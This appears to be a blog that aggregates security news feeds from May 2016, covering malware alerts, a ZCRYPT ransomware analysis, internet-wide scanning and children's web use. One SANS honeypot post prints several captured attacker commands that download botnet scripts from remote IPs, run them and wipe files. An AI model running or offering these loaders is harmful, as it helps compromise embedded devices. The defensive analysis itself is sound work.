Tuesday, May 31, 2016

Feedly:Threats RSS Feed - Symantec Corp.. Exp.CVE-2015-2545



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Tuesday, May 31st 2016 http://ift.tt/1TPcU2E, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

...(more)...

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Ascesso!gm



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Threats RSS Feed - Symantec Corp.. Backdoor.Enfourks



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Shopperzads



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. No warrant needed to get cell phone location: US court



from Security News - Software vulnerabilities, data leaks, malware, viruses

Police don't need a warrant to obtain mobile phone location data for a criminal investigation, a US appeals court ruled Tuesday in a case closely watched for digital-era privacy implications.

Feedly:Fortinet Blog | News and Threat Research - All Posts. How Secure is Your Company’s Financial Data?



from Fortinet Blog | News and Threat Research - All Posts

Businesses today face an ever-evolving threatscape with growing pressure to rethink security strategies for long-term sustainability. As a result, corporate finance teams are more actively partnering with IT to ensure the organization’s security strategies protect critical financial data. Fortinet’s Araldo Menegon discusses the issues and trends affecting corporate finance teams today.Q&A with Araldo Menegon, Global Managing Director Financial Services at Fortinet Isn’t security managed by corporate IT? Why do finance teams need to get involved?More...

Feedly:SANS Internet Storm Center, InfoCON: green. Increase in Port 23 (telnet) scanning, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

Some readers noted that over the weekend, port 23 scans were up significantly. I just took a quick look at our honeypot, and don't really see anything significantly different, other then the well known fact that if you run a telnet server with default password, you are probably already compromised.

Typically, a sharp increase in the number of source IPs indicates some type of worm that uses vulnerable systems to scan for more victims after it infects them.

The main target of telnet scans are usually embedded devices. The exploit follows a pretty simple pattern:

  1. brute force password (usually a well known default password)
  2. Download additional malware via ftp/http or tftp (typically multiple binaries for various architectures)
  3. run the malware, which will typically setup a client for a DDoS botnet.

The malware is very ephemeral, with the distribution point often being shut down by the time it scans our honeypot. Here are a couple of results from our honeypot, and a few tricks about how to deal with lots of data in pcap files.

The first question is: Is this traffic spoofed? As a visual check, we compare the before and after distribution by /8 network. The image shows some deviations, but overall the graphs follow each other and there are no huge discrepancies in RFC1918 networks or other obviously spoofed networks.

For the honeypot, I setup traffic captures collection 100MB pcap files with tcpdump (tcpdump -w /tmp/telnet -C100 port 23). On this very busy honeypot (it covers several thousand IPs), it took about 15 minutes to get to 100MB.

Next, lets take a look at telnet payloads with tshark:

tshark -r telnet -n -Y 'telnet.data && tcp.len>1' -T fields -e telnet.data | sort | uniq -c | sort -n

Here are some of the top commands:

------
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 93. 186.254.152 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 93. 186.254.152; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh

------

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://149 .56.110.173/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 149 .56.110.173;sh bin2.sh;busybox tftp 149 .56.110.173 -c get bin3.sh;sh bin3.sh;busybox ftpget 149 .56.110.173 bin4.sh;sh bin4.sh;exit

------

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192 .227.221.223 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192 .227.221.223; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;

------

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208 .67.1.114/rv.sh;sh rv.sh;busybox tftp -r rv1.sh -g 208 .67.1.114;sh rv1.sh;busybox tftp 208 .67.1.114 -c get rv2.sh;sh rv2.sh;busybox ftpget 208 .67.1.114 rv3.sh rv3.sh;sh rv3.sh;exit

------

As you can see, they all follow the standard "pattern".

p0f can give us a quick break down of operating systems for the collected traffic. Pretty much all of the hits come from Linux. Out of the about 1 million p0f records, we got less then 200 that indicate an operating system other then Linux.

So in conclusion: Not sure what causes the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and don't use default passwords.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Feedly:Threats RSS Feed - Symantec Corp.. WSH.Downloader



from Threats RSS Feed - Symantec Corp.

Discovered:
May 31, 2016
Updated:
May 31, 2016 11:35:23 AM
Type:
Trojan
Systems Affected:
Windows 2000, Windows 7, Windows 8, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

WSH.Downloader is a Trojan horse that downloads a malicious file to the compromised computer.

Antivirus Protection Dates

  • Initial Rapid Release version May 31, 2016
  • Latest Rapid Release version May 31, 2016
  • Initial Daily Certified version May 31, 2016
  • Latest Daily Certified version May 31, 2016
  • Initial Weekly Certified release date June 1, 2016

Click

here

for a more detailed description of Rapid Release and Daily Certified virus definitions.

Writeup By: Hector Navarro Martín

Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. Researchers uncover extensive Twitter-based cyber espionage campaign targeting UAE dissidents, journalists



from Security News - Software vulnerabilities, data leaks, malware, viruses

A new report from the University of Toronto's Citizen Lab reveals a sophisticated international cyber-espionage campaign targeting journalists and activists whose work concerns the United Arab Emirates. The campaign used elaborate ruses, including fake organizations and journalists, to engage targets online, then entice them to open malicious files and links containing malware capable of monitoring their activities.

Feedly:Security Intelligence | TrendLab.... Crypto-ransomware Attacks Windows 7 and Later, Scraps Backward Compatibility



from Security Intelligence | TrendLab...

Crypto-ransomware Attacks Windows 7 and Later, Scraps Backward Compatibility

Ransomeware04

How do you know that something has become very popular? Simple – when poorly-made knockoff versions start to hit the marketplace. Ransomware, it seems, has hit that point.

The writers behind the new ZCRYPT ransomware family have either scrapped support for Windows XP, or did a sloppy job in creating it. This new family only targets systems with newer versions of Windows, specifically Windows 7 and later. Is ZCRYPT deliberately cutting of older operating systems, or is it just poorly-written malware?

Exclusive Crypto-ransomware

When we came across ZCRYPT it first appeared to be a fairly nondescript threat. It encrypts the user’s files and uses the .ZCRYPT extension as its marker. It is capable of encrypting the following file formats:

.zip, .mp4, .avi, .wmv, .swf, .pdf, .sql, .txt, .jpeg, .jpg, .png, .bmp, .psd, .doc, .docx, .rtf, .xls, .xlsx, .odt, .ppt, .pptx, .xml, .cpp, .php, .aspx, .html, .mdb, .3fr, .accdb, .arw, .bay, .cdr, .cer, .cr2, .crt, .crw, .dbf, .dcr, .der, .dng, .dwg, .dxg, .eps, .erf, .indd, .kdc, .mdf, .mef, .nrw, .odb, .odp, .ods, .orf, .p12, .p7b, .p7c, .pdd, .pef, .pem, .pfx, .pst, .ptx, .r3d, .raf, .raw, .rw2, .rwl, .srf, .srw, .wb2, .wpd, .tar, .jsp, .mpeg, .msg, .log, .cgi, .jar, .class, .java, .bak, .pdb, .apk, .sav, .tar.gz, .emlx, .vcf

It makes the usual threats of deleting the files if the victim don’t pay up within a week. Ransom is set at 1.2 BTC (approximately 500 US dollars), with the ransom going up to 5 BTC (approximately 2,200 US dollars) after four days. The ransom note looks like this:

Figure 1. Ransom note (Click to enlarge)

However, what it can do in systems with Windows 7 and later, it only tries with other systems.  According to our analysis, it fails to either encrypt the files properly or display the ransom note when launched in an older version of Windows, such as Windows XP. The malware calls a function which does not exist in earlier versions of Windows; this breaks it for the older operating systems.

Interestingly, this particular family also tried to spread via USB flash disks: it plants a copy of itself onto removable drives. This is relatively unusual in crypto-ransomware; back in December of 2013 we identified a CryptoLocker variant which behaved similarly. It never seems to have caught on, however. Crypto-ransomware authors seem to be satisfied with distributing their wares via the most common means: malvertising and spam.

C&C Servers

The domain name of the command-and-control (C&C) server was poiuytrewq.ml, a reversal of qwertyuiop. This is the top alphabetical row on a standard QWERTY keyboard. The top-level domain .ml is assigned to Mali; registrations for domains under this TLD were given away for free starting in April 2013. (URLs that hosted ZCRYPT variants were also hosted on .ml domains.)

The threat actor also enjoyed free anonymity because the domain registration masked the actual identity of registrant. The C&C domain is already tagged “canceled, suspended, refused, or reserved”.

Industry Practices

Backing up is still the best defense against crypto-ransomware; the 3-2-1 rule ensures that users still have a copy of their data even if they are affected by similar threats. We strongly advise against paying the ransom; this only ensures that the threat will continue to become bigger and bigger.

Trend Micro says NO to ransomware. We strongly advise users not to pay ransom demands as it fuels cybercrime and promotes further propagation of ransomware.

Trend Micro Solutions

Trend Micro offers different solutions to protect enterprises, small businesses, and home users to help minimize the risk of getting affected by crypto-ransomware, such as ZCRYPT.

Enterprises can benefit from a multi-layered, step-by-step approach in order to best mitigate the risks brought by these threats. Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security prevents ransomware from ever reaching end users. At the endpoint level, Trend Micro Smart Protection Suites deliver several capabilities like behavior monitoring and application control, and vulnerability shielding that minimize the impact of this threat. Trend Micro Deep Discovery Inspector detects and blocks ransomware on networks, while Trend Micro Deep Security™ stops ransomware from reaching enterprise servers–whether physical, virtual or in the cloud.

For small businesses, Trend Micro Worry-Free Services Advanced offers cloud-based email gateway security through Hosted Email Security. Its endpoint protection also delivers several capabilities such as behavior monitoring and real-time web reputation in order detect and block ransomware.

For home users, Trend Micro Security 10 provides robust protection against ransomware, by blocking malicious websites, emails, and files associated with this threat.

Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key.

TippingPoint customers will be protected from attacks exploiting this vulnerability with the following ThreatDV filter that will be made available on May 31:

  • 24733: HTTP: Ransom_ZCRYPT.A

Related hashes:

D14954A7B9E0C778909FE8DCAD99AD4120365B2E – Ransom_ZCRYPT.A

With additional analysis from Rhena Inocencio, Jay Yaneza, and Ruby Santos.





Feedly:Darknet – The Darkside. Wfuzz – Web Application Brute Forcer

Feedly:Errata Security. From scratch: why these mass scans are important



from Errata Security

The way the Internet works is that "packets" are sent to an "address". It's the same principle how we send envelopes through the mail. Just put an address on it, hand it to the nearest "router", and the packet will get forwarded hop-to-hop through the Internet in the direction of the destination.

What you see as the address at the top of your web browser, like "www.google.com" or "facebook.com" is not the actual address. Instead, the real address is a number. In much the same way a phonebook (or contact list) translates a person's name to their phone number, there is a similar system that translates Internet names to Internet addresses.

There are only 4 billion Internet addresses. It's a number between between 0 and 4,294,967,296. In binary, it's 32-bits in size, which comes out to that roughly 4 billion combinations.

For no good reason, early Internet pioneers split up that 32-bit number into four 8-bit numbers, which each has 256 combinations (256 × 256 × 256 × 256 = 4294967296). Thus, why write Internet address like "192.168.38.28" or "10.0.0.1". 

Yes, as you astutely point out, there are many more than 4 billion devices on the Internet (the number is closer to around 10 billion). What happens is that we can use address sharing (also called "network address translation"), so that many devices can share a single Internet adress. All the devices in your home (laptop, iPad, Nest thermistat, WiFi enabled Barbie, etc.) has a unique address that only works in the home. When the packets go through your home router to the Internet, they get changed so that they all come from the same Internet address.

This sharing only works when the device is what's called a "client", which consumes stuff on the Internet (like watching video, reading webpages), but which doesn't provide anything to the Internet. Your iPad reaches out to the Internet, but in general nothing on the Internet is trying to reach your iPad. Sure, I can make a Facetime video call to your iPad, but that's because both of us are clients of Apple's corporate computers.

The opposite of a client is a "server". These are the computers that provide things to the Internet. These are the things you are trying to reach. There are web server, email servers, chat servers, and so. When you hear about Apple or Facebook building a huge "data center" somewhere, it's just a big building full of servers.

A single computer can provide many services. They are distinguished by a number between 0 and 65,535 (a 16-bit number). Different services tend to run on "well known" ports. The well known port for encrypted web servers is 443 (no, there's no good reason that number out of 65535 combinations was chosen, it's not otherwise meaningful). Non-encrypted web-servers are at port 80, by the way, but all servers by now should be encrypted.

Web links like "http://ift.tt/gmvlld" must contain the port number. However, if you are using the default, then you can omit it, so "https://www.google.com" is just fine. However, any other port must be specified, such as "http://ift.tt/1TUwLeR". When you visit such links within your browser, it'll translate the name into an Internet address, then send packets to the combination address:port.

Normally, when you look for things on the web, you use a search engine like Google to find things. Google works by "spidering" the Internet, reading pages, then following links to other pages. After I post this blog post, Google is going to add "http://ift.tt/1TUwLeR" to it's index and try to read that webpage. It doesn't exist, but Google will think it does, because it reads this page and follows the link.

There is an idea called the "Dark Internet" which consists of everything Google can't find. Google finds only web pages. It doesn't find all the other services on the Internet. It doesn't find anything not already linked somewhere on the web.

And that's where my program "masscan" comes into play. It searches for "Dark Internet" services that aren't findable in Google. It does this by sending a packet to every machine on the Internet.

In other words, if I wanted to find every (encrypted) web server on the Internet, I would blast out 4 billion packets, one to each address at port 443. I would then listen for reply packets. All valid acknowledgements mean there's a computer with that address running such a service. When I do this, I get about 30 million responses, by the way. A single web server can host many websites, the actual number of websites is more like a billion.

Such a scan is possible because even though it takes 4 billion packets to do this, networks are really fast. A gigabit network connection, such as the type Google Fiber might provide you, can transmit packets at the rate of 1 million per second. That means, in order to scan the entire Internet, I'd only need 4 thousand seconds, or about an hour.

People get made when I scan this fast, especially those with large networks who see a flood of packets from me in an hour. Therefore usually scan slower, at only 125,000 packets per second, which takes about 10 hours to complete a scan.

Two years ago a bug in encrypted web services was found, called "Heartbleed". How important a bug was it? Well, with masscan, I can easily send a packet to all 4 billion addresses, and test them to see if they are vulnerable. The last time I did this, I found about 300,000 servers still vulnerable to the bug.

Right at the moment, I'm doing a much more expansive scan. Instead of scanning for a single port, I'm scanning for all possible ports (all 65536 of them). That's a huge scan that would take 50 years at my current rate, or 5 years if I run at maximum speed on my Internet link. I don't plan on finishing the scan, but stopping it after a couple weeks, as sort of a random sample of services on the Internet.


One finding I have is a service called "SSH". It a popular service that administrators (the computer professional who maintain computers) use to connect to servers to control them. Normally, it uses port 22. Consider the output of my full scan below:


What you see is that I'm finding SSH on all sorts of ports. For every time somebody put SSH on the expected port of 22, roughly 15 people have decided to change the port and put it somewhere else.

There are two reasons they might do so. The first is because of a belief in the fallacy of security through obscurity, that if they choose some random number other than 22, then hackers won't find it. That's likely the case where we see old versions of SSH in the above picture, such as version 1.5 instead of the newer 2.0.

The other reason, though, is simply to avoid the noise of the Internet. Hackers are constantly scanning the Internet for SSH on port 22, and once they find it, start "grinding" password, trying password after password until they find one that works. This fills up log files and annoys people, so they put their services on other ports.

Note in the above picture two entries where Internet addresses starting with 121.209.84.x have SSH running at port 5000. Looking on the Internet, it seems these addresses belong to Telstra. It seems they have some standard policy of putting SSH on port 5000. If you were a hacker wanting to break into Telstra, that sort of information would be useful to you. That's the reason for doing this scan. I'm not going to grab all address:port combinations, but enough where I can start finding patterns.


Another thing I've found relates to something called VNC. It allows one computer to connect to the screen of another computer, so that you can see their desktop. It normally runs at port 5900. When you masscan the entire Internet for that port, you'll find lots of cases where people have the VNC service installed on their computer and exposed to the Internet, but without a password. This article describes some of the fun things we find in these searches, from toilets, to power plants, to people's Windows desktops, to Korean advertising signs.

But this full scan finds VNC running at other ports, as shown in the following picture.


For everybody running VNC on the standard port, it appears about 5 to 10 people are running it on some other random port. A full scan of the Internet, on all ports, would find a much richer set of VNC servers.

Conclusion

I tweet my research stuff often, but it's often inscrutable, since you are suppose to know things like VNC, SSH, and random/standard port numbers, which even among techies isn't all that common. In this post, I tried to describe from scratch the implications of the sorts of things I'm finding.





















Monday, May 30, 2016

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Tuesday, May 31st 2016 http://ift.tt/1XKoICx, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

...(more)...

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Incompat



from Threats RSS Feed - Symantec Corp.

Threat Spotlight: Trojan.Cryptowall

Trojan.Cryptowall is a Trojan horse that encrypts files on the compromised computer. It then asks the user to pay to have the files decrypted.

The threat typically arrives on the affected computer through spam emails, exploit kits hosted through malicious ads or compromised sites, or other malware.

Once the Trojan is executed on the compromised computer, it creates a number of registry entries to store the path of the encrypted files and run every time the computer restarts. It encrypts files with particular extensions on the computer and creates additional files with instructions on how to obtain the decryption key.

This threat family attempts to convince the user to pay money in order to get the key to unlock their files. It uses a variety of different techniques in order to encourage the user to pay the ransom.

More information on Trojan.Cryptowall is available in the threat family writeup.

Feedly:We Live Security. 65 million Tumblr users should probably be careful…



from We Live Security

65 million Tumblr users have had their details compromised as a result of a recently-discovered breach dating back to 2013. But it's not just their passwords that they should be concerned about.

The post 65 million Tumblr users should probably be careful… appeared first on We Live Security.

Feedly:Securelist / All Updates. Small users in a big network



from Securelist / All Updates

no-image

Children use the Internet for schoolwork, socializing, watching films and cartoons, playing games and much more. But, as we all know, browsing the web can be an unsafe business. In order to control their children’s online activity many parents use specialized software – so-called parental control.

This software is usually capable of controlling the amount of time a child spends online or using the computer, which apps can be launched and what personal data can be disclosed. One of the most important features of a parental control product, however, is the ability to restrict access to web resources containing undesirable content.

This article examines the statistics of visits by children to websites with specific categories of content. For this we will use Kaspersky Security Network (KSN) statistics based on notifications by the Parental Control module in Kaspersky Lab products. These statistics will allow us to estimate which categories of undesirable websites children visit most often.

How the statistics are collected

Kaspersky Lab’s Parental Control module scans the content of the webpage that a child is trying to visit. If the site belongs to one of the 14 categories listed in the module, it notifies KSN (no personal data is involved and the user’s confidentiality is respected).

Access to that webpage is only denied if the parents have selected the appropriate category in the product settings. The statistics are collected anonymously, regardless of whether the parents have selected the appropriate category (i.e., whether or not that category is blocked by Parental Control).

It should be noted that these statistics do not include mobile device statistics.

At the current time, web filtration is carried out for the following content categories:

We selected the first 12 categories for analysis. We decided to omit “Religion” and “News media” as these categories were only introduced recently and sufficient statistics have not yet been collected.

The global picture

First of all, let’s look at the global statistics.

Small users in a big network

Distribution of Parental Control notifications between the 12 website categories globally, April 2015 – April 2016.

We can see from this diagram that children around the world spend most time on social networking sites and instant messengers, playing computer games, and, while online, repeatedly encounter the themes of alcohol, tobacco and drugs. Less frequently, children and teenagers visit online stores, watch videos and listen to music online, sometimes encounter obscene language and occasionally visit (perhaps accidentally) porn sites.

These are the average statistics for the entire world. But are they the same for all regions or countries? It turns out that they aren’t.

Regional differences

For our comparison, we selected the top five website categories from the global ranking and looked at how they differed across five regions:

  • North America (US and Canada)
  • Western Europe (Austria, Belgium, UK, Germany, Denmark, Ireland, Spain, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, France, Switzerland, Sweden)
  • CIS (Russia, Kazakhstan, Belarus, Ukraine)
  • Latin America (Argentina, Brazil, Mexico)
  • Far East (China, Singapore, Hong Kong, Macao, Taiwan, Japan, South Korea).

The results of the comparison are shown below:

Small users in a big network

Proportion of Parental Control notifications for Top 5 categories in different regions

In North America, children visit social media websites, use instant messaging systems, chats and forums less frequently than the world average, although they show more interest in computer games, alcohol and online shopping.

The situation in Western Europe is very similar to that in North America.

In the CIS, children and teenagers are less interested in online shopping than in other regions.

In Latin America, as well as in the CIS, Internet communication media are very popular with kids and teens, while computer games are played less frequently than in other regions.

The situation is different in the Far East. Social networks are almost as popular there as they are in western countries, but kids and teens don’t spend as much time playing online computer games (which may be due to the popularity of game consoles). Instead, they spend more time visiting online shops, such as the Japanese Rakuten, amazon.co.jp, Uniqlo, and Taobao in China.

Differences between countries

We found that even between countries within the same region there are differences in the popularity of the website categories. For the purposes of comparing the situations in different countries, we added the “Adult content” category to the top five. Let’s begin with that category.

Adult content

When we speak of children’s safety online, it’s impossible to avoid the topic of pornography – this is the worst nightmare for millions of parents. For quite some time, this category was at the top of the ratings, but we now have some good news! According to Kaspersky Lab’s Parental Control statistics, children from around the world are visiting pornographic and erotic websites, adult dating sites and online sex shops less and less.

Small users in a big network

Popularity of the “Adult content” category around the world, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control module statistics

However, we cannot rule out the possibility that children visit adult content websites from their mobile devices: for them, it is easier to watch porn on their phone, with no parental control tools installed, than it is on a computer that is closely watched by their parents.

Children in China show the most interest in adult content sites. Children in the UK, US and Russia visit such sites less often.

Small users in a big network

Popularity of the “Adult content” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control module statistics

According to Kaspersky Lab’s Parental Control statistics, the adult content website www.xvideos[.]com is the most popular in all regions. If the Parental Control module is configured to block access to adult content sites, then a child’s attempt to visit this site will finish with a warning screen being displayed. It should be noted that Safe Kids, Kaspersky Lab’s new product, works on mobile devices as well:

Small users in a big network

Safe Kids notification on a mobile device

If you want to reliably safeguard your child from adult content, make sure you block this category in the parental control module.

Internet Communication media

67% of all visits were to websites belonging to the “Internet communication media” category, which includes social networks, instant messengers, chats and forums.

Unsurprisingly, social networks are the most popular sites with children throughout the world – these sites allow them to talk to their friends, keep a kind of diary, share photos and videos, as well as shop online, play games, and watch cartoons or films. As well as all that, there is a lot of content that children shouldn’t be seeing: on some social networks you can find pornography, purchase drugs.

The most frequently visited sites in this category are Facebook, Twitter, YouTube and Pinterest. To a lesser extent children also visit Instagram and the web-based version of the WhatsApp messenger.

According to KSN data, over the last year and a half children and teenagers have been spending less time chatting with their friends online from their computers.

Small users in a big network

Popularity of the “Internet communication media” category worldwide, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control statistics

We presume that this is due to the growing popularity of mobile Internet. Today, mobile devices are being used more and more for online communications, especially in developed countries. This is beyond the scope of this analysis, however, as we are looking at the statistics of Parental Control module detections on computers; these statistics don’t take into account how many times a day children and teenagers visit their social media accounts from mobile devices. Also, IM services such as Telegram or Viber are primarily accessed from mobile devices. In other words, children, and especially teenagers, are far more active than these statistics suggest when it comes to both types of online communications (i.e. mobile- and computer-based).

Small users in a big network

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Internet communication media are most popular in Mexico, Brazil, Russia and Italy, and least popular in China, Germany and the UK.

We presume that for China, this is due to the state’s Internet censorship practices, while in Germany and the UK it is related to the widespread use of mobile technologies and smartphones in the everyday lives of schoolchildren.

This is all well and good – technologies make our world more convenient, and talking to someone face-to-face on the other side of the planet can seem like magic! But any magic has a dark side to it. Child molesters, fraudsters, trolls, perverts and other nefarious characters can spoil the life of a child or teenager who doesn’t stick to the rules of conduct on social networks. Read more here about how children and teenagers should behave on the social networks to protect themselves from malicious users.

Computer games

Children have always played games. However, in recent decades real-life games have been almost completely superseded by computer games.

Today’s computer games are products of advanced technologies; they are realistic, social, absorbing, spectacular creations by designers and script writers. It comes as a little surprise that gaming sites around the world come second in terms of popularity among children and teenagers.

Small users in a big network

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Computer games are least popular in Japan, Italy and Mexico. However, in these countries there are different reasons for this. Game consoles such as Sony PlayStation and Nintendo are widespread in Japan, where they are manufactured. In Mexico and Italy, judging by our statistics, kids and teens simply prefer social networks to computer games.

Steam is one of the gaming sites most often visited by children and teenagers. It is in fact more than a mere online gaming store – it is a large gaming community where kids and teens can talk to fellow gamers, find new friends, read news and, naturally, purchase games and share their in-game achievements.

Small users in a big network

Steam’s homepage

As can be seen in the statistics of websites visited by children, Minecraft is another gaming website that children and teens often visit. Minecraft can be seen as an educational (edutainment) game, and in some countries it is even part of the school curriculum, within the framework of the MinecraftEdu project.

The time that your child spends playing computer games needs to be regulated. Overindulging in games can lead to a dependence. This is especially relevant for so-called infinite games that are limited to one game plot and do not have a beginning or end. Massively multiplayer online role-playing games (MMORPG) fall under this category. Cases are known when overuse of MMORPG has led to psychological harm, gaming addictions and even to death by exhaustion.

Parents should also take note of what games their child is playing, the age ratings and the contents of the game, as well as the kind of skills they develop.

Computer games are not bad, but it’s better for children to spend their time productively.

Alcohol, tobacco, narcotics

The popularity of websites in the “Alcohol, tobacco, narcotics” category came as a bit of a surprise. Children in Germany (22.79%) and the UK (25.37%) show most interest in this topic.

Small users in a big network

Popularity of the “Alcohol, tobacco and narcotics” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

However, a child can encounter this topic just about anywhere on the Internet. For example, in all types of teenager blogs it is not uncommon to see a picture of a girl with a bong, or pictures glorifying vodka.

Small users in a big network

Publications in social media promoting the consumption of alcohol, tobacco or drugs

Similar messages often occur on different entertainment sites, such as 9gag.

Small users in a big network

Images published on the website 9gag

In recent years, “legal highs” have become widespread, and can be easily purchased online. The authorities in different countries have trouble keeping up and block hundreds of new legal high websites that appear online every day. Social media also contains numerous offers to buy “legal” narcotics.

Small users in a big network

Online shop selling “legal highs”

Synthetic drugs are by no means legal, let alone safe. The effect of consuming “spice” and “salts” is unpredictable and can lead to serious harm.

Electronic commerce

The popularity of this category shows just how interested children are in online shopping.

Small users in a big network

Popularity of the “Electronic commerce” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

As we can see, children and teenagers in China, Japan and the US visit online shops more frequently than others. Judging by the list of websites most often reported by the Parental Control module, the most popular online shops are Taobao in China, Uniqlo in Japan, and Amazon in the US.

Software, audio and video

An interesting trend can be seen in the “Software, audio, video” category. Over the last year and a half, visits by children and teenagers to visit websites where they can download or watch films, cartoons or listen to music have doubled.

Small users in a big network

Popularity of the “Software, audio, video” category in different countries, January 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

On the face of it, this website category doesn’t seem to be a big deal. However, you shouldn’t forget about illegal software and malware – it may not hurt your child, but could cause quite a bit of damage to your computer.

Small users in a big network

Popularity of the “Software, audio, video” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Children in Japan watch cartoons and listen to music online more often than their peers in other countries. The figures for Russia and Mexico are the lowest. In Russia, this may be due to the fact that most young users listen to music on the VKontakte social network.

According to Kaspersky Lab’s Parental Control statistics, YouTube is the most popular website in this category.

Conclusion

The popularity of certain types of websites among children in different countries could be linked to each country’s cultural peculiarities and economic conditions.

If we look at the entire global picture, there is a downward trend in the popularity of Internet communication media among children and teenagers. The underlying reason is the increasing use of mobile technologies and the availability of smartphones in developed countries, the emergence of convenient mobile social media and Internet communication apps, and the fact that users can always stay online thanks to their mobile devices. However, in those countries where smartphones are less prevalent, children tend to use computers more often for online communications.

Interestingly, the lower the “Internet communication media” index is for a specific country, the more popular computer games are:

kidsinternet_eng_17

Popularity of the “Internet communication media” and “Computer games” categories in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

It’s interesting to see that children are becoming increasingly self-sufficient online: they choose which music they want to listen to, which films or cartoons they watch, and which products they want to – possibly – purchase.

Self-reliance is a positive trait for your child, but you still need to keep tabs on what they are doing online, just like in real life. Parental control software may just be an aid to safeguard your child from undesirable content, but it could well come in very handy – so don’t just dismiss it out of hand. For example, Kaspersky Lab’s product Safe Kids not only blocks undesirable sites but also notifies the parents of any alarming search requests that a child makes, and about their activities on social media. Since Safe Kids operates on mobile devices as well, parents can also get information about where their child is.

For today’s children, and especially teenagers, the Internet is their natural habitat. We do everything we can to keep it safe.

Feedly:Securelist / All Updates. BerlinSides …electrifying!



from Securelist / All Updates

It was the last weekend of May and just like every year, hackers, forensic experts and pentesters met at the University Hall in Berlin for the BerlinSides conference. ‘A con from hacker for hacker’.

BerlinSides is the successor of the PH-Neutral conference held by FX, who once said he’s going to host his conference for ten years. After that, Aluc stepped in and now runs the BerlinSides conference since 2010.

Start was right after the PXE conference ends on Friday 27th of May and it lasts for four days. As usual, the last day got labeled “OpSec 4 Nerds” and held in a Dojo. It’s about “hand to hand combat” and optional to all attendees who have a good health insurance. Today is the last day of the conference and the exercises in the Dojo are going on right now.

The schedule of the conference can be found here: http://ift.tt/1Uo7dWf

In contrast to the Chaos Computer Congress, this conference is by invitation only and just like in Las Vegas, what’s happening inside of BerlinSides stays inside. No journalists, cameras or any recording devices are allowed. Speakers can go into details and give some unique insights in projects, incidents and new vulnerabilities.

0x100 people attended the conference this year and beside the talks I also enjoyed the networking, music and party. I met people I haven’t seen for a while, some I never met before and we had some good discussions.

Kaspersky Lab is the premium sponsor of this years’ conference and we are happy to see such great events and to support the community.

My colleague Stefan Ortloff held the opening talk named “Cross-Platform Malware To Attack The Bitcoin-Sphere” and gave some insights in an ongoing investigation conducted by himself.

2016BSides
(Host Aluc on the right, me on the left side)

Due to the nature of this conference, there aren’t any further details I can add to this blog, but I’d like to thank Aluc for his commitment and I look forward attending next year again!

Sunday, May 29, 2016

Feedly:Errata Security. Doing a 'full scan' of the Internet right now



from Errata Security

So I'm doing a "full" scan of the Internet, all TCP ports 0-65535 on all addresses. This explains the odd stuff you see from 209.126.230.7x.


I'm scanning at only 125kpps from 4 source IP addresses, or roughly 30kpps from each source address. This is so that I'll get below many thresholds for IDSs, which trigger when they see fast scans from a single address. The issue isn't to avoid detection, but to avoid generating work for people who get unnecessarily paranoid about the noise they see in their IDS logs.

This scan won't finish at this speed, of course, it won't get even close. Technically, it'd take 50 years to complete at this rate.

The point isn't create a comprehensive scan, but to do sampling scan. I'll let it run a week like this, which will get 0.1% of the Internet, and then stop the scan.

What am I looking for? I don't know. I'm just doing something weird in order to see what happens. With that said, I am testing any port I connect to with Heartbleed. This should give us an estimation of how many Internet-of-Things devices are still vulnerable to that bug. I'm also interested to see how many things allow connections to port 0.

